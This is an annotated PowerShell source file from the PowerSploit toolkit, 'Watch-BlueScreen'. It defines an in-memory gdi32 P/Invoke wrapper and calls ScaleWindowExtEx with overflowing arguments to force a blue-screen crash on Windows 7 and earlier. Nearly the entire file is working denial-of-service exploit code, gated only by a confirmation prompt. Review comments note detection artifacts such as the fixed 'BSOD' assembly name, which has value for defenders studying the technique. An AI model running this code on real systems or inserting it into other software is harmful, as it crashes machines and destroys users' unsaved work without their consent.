PowerSploit/CodeExecution/Watch-BlueScreen.ps1


# Crashes the local machine (BSOD) through a GDI32 integer-overflow bug; the
# help block below states this applies to Windows 7 and below. Everything the
# function does is local to the calling process and session: it defines an
# in-memory P/Invoke wrapper for three gdi32 exports and then calls them once,
# guarded by an interactive confirmation prompt.
function Watch-BlueScreen
{
<#
.SYNOPSIS
Cause a blue screen to occur (Windows 7 and below).
PowerSploit Function: Watch-BlueScreen
Author: Matthew Graeber (@mattifestation)
Original Research: Tavis Ormandy and Nikita Tarakanov
License: BSD 3-Clause
Required Dependencies: None
Optional Dependencies: None
.NOTES
Tavis Ormandy documented this technique on 2/3/2013 and Nikita Tarakanov
tweeted this technique on 5/13/2013.
.LINK
https://gist.github.com/taviso/4658638
http://blog.cmpxchg8b.com/2013/02/the-other-integer-overflow.html
https://twitter.com/NTarakanov/status/334031968465453057
#>
# No parameters. ConfirmImpact = 'High' documents the destructive intent; the
# actual gate is the ShouldContinue() call further down.
[CmdletBinding( ConfirmImpact = 'High')] Param ()
# The [Gdi32] type literal only resolves once CreateType() below has run in
# this session; the first call lands in the catch block and emits the type,
# later calls in the same session reuse it.
try { $Gdi32 = [Gdi32] } catch [Management.Automation.RuntimeException]
{
# In-memory dynamic assembly 'BSOD' / module 'BSOD' holding a public class
# 'Gdi32'. Nothing is written to disk ('Run' access only). These names are
# fixed strings and therefore a stable artifact of this technique in the
# process that runs it -- NOTE(review): whether they surface in any given
# telemetry source (ETW/AMSI/assembly-load events) should be confirmed.
$DynAssembly = New-Object System.Reflection.AssemblyName('BSOD')
$AssemblyBuilder = [AppDomain]::CurrentDomain.DefineDynamicAssembly($DynAssembly, 'Run')
$ModuleBuilder = $AssemblyBuilder.DefineDynamicModule('BSOD', $False)
$TypeBuilder = $ModuleBuilder.DefineType('Gdi32', 'Public, Class')
# Build a DllImportAttribute instance with SetLastError = $true so that the
# first P/Invoke below records Win32 error state. The attribute's dll string
# here is 'ntdll.dll' while the method itself is defined against 'Gdi32.dll'
# -- NOTE(review): looks inconsistent; confirm which name the runtime
# honours when a DllImport pseudo-attribute is applied to a PInvoke method.
$DllImportConstructor = [Runtime.InteropServices.DllImportAttribute].GetConstructor(@([String]))
$SetLastError = [Runtime.InteropServices.DllImportAttribute].GetField('SetLastError')
$SetLastErrorCustomAttribute = New-Object Reflection.Emit.CustomAttributeBuilder( $DllImportConstructor, @('ntdll.dll'),
[Reflection.FieldInfo[]]@($SetLastError), @($true))
# HDC CreateCompatibleDC(HDC): public static, stdcall, Winapi, Auto charset.
# Only this import carries the SetLastError attribute.
$TypeBuilder.DefinePInvokeMethod( 'CreateCompatibleDC',
'Gdi32.dll',
'Public, Static',
'Standard',
[IntPtr],
@([IntPtr]),
'Winapi',
'Auto' ).SetCustomAttribute($SetLastErrorCustomAttribute)
# DWORD SetLayout(HDC, DWORD). Out-Null discards the returned MethodBuilder
# so it does not leak onto the function's output pipeline.
$TypeBuilder.DefinePInvokeMethod( 'SetLayout',
'Gdi32.dll',
'Public, Static',
'Standard',
[UInt32],
@([IntPtr], [UInt32]),
'Winapi',
'Auto' ) | Out-Null
# BOOL ScaleWindowExtEx(HDC, int, int, int, int, LPSIZE). Same Out-Null
# reasoning as above.
$TypeBuilder.DefinePInvokeMethod( 'ScaleWindowExtEx',
'Gdi32.dll',
'Public, Static',
'Standard',
[Bool],
@([IntPtr], [Int32], [Int32], [Int32], [Int32], [IntPtr]),
'Winapi',
'Auto' ) | Out-Null
# Bake the type; from here on [Gdi32] resolves in this session.
$Gdi32 = $TypeBuilder.CreateType()
}
# GDI layout flag passed to SetLayout (right-to-left).
$LAYOUT_RTL = 1
# Interactive gate. NOTE(review): ShouldContinue() prompts regardless of
# $ConfirmPreference / -Confirm (unlike ShouldProcess) and there is no -Force
# switch here, so a non-interactive host is expected to block or fail at this
# point -- confirm for the PowerShell version in use.
if ($psCmdlet.ShouldContinue( 'Do you want to continue?', 'You may want to save your work before continuing.' ))
{
# Memory DC with no reference device, switched to RTL layout, then one
# ScaleWindowExtEx call with the extreme Int32.MinValue / -1 multiplier and
# divisor -- the integer-overflow case the linked "other integer overflow"
# write-up describes. On an affected (unpatched Windows 7 and below, per the
# synopsis) system this is the crash; on a patched system the call is
# presumably just rejected. Return values are discarded, nothing is cleaned
# up (no DeleteDC), since the machine is expected not to survive the call.
$DC = $Gdi32::CreateCompatibleDC([IntPtr]::Zero)
$Gdi32::SetLayout($DC, $LAYOUT_RTL) | Out-Null
$Gdi32::ScaleWindowExtEx($DC, [Int32]::MinValue, -1, 1, 1, [IntPtr]::Zero) | Out-Null
}
}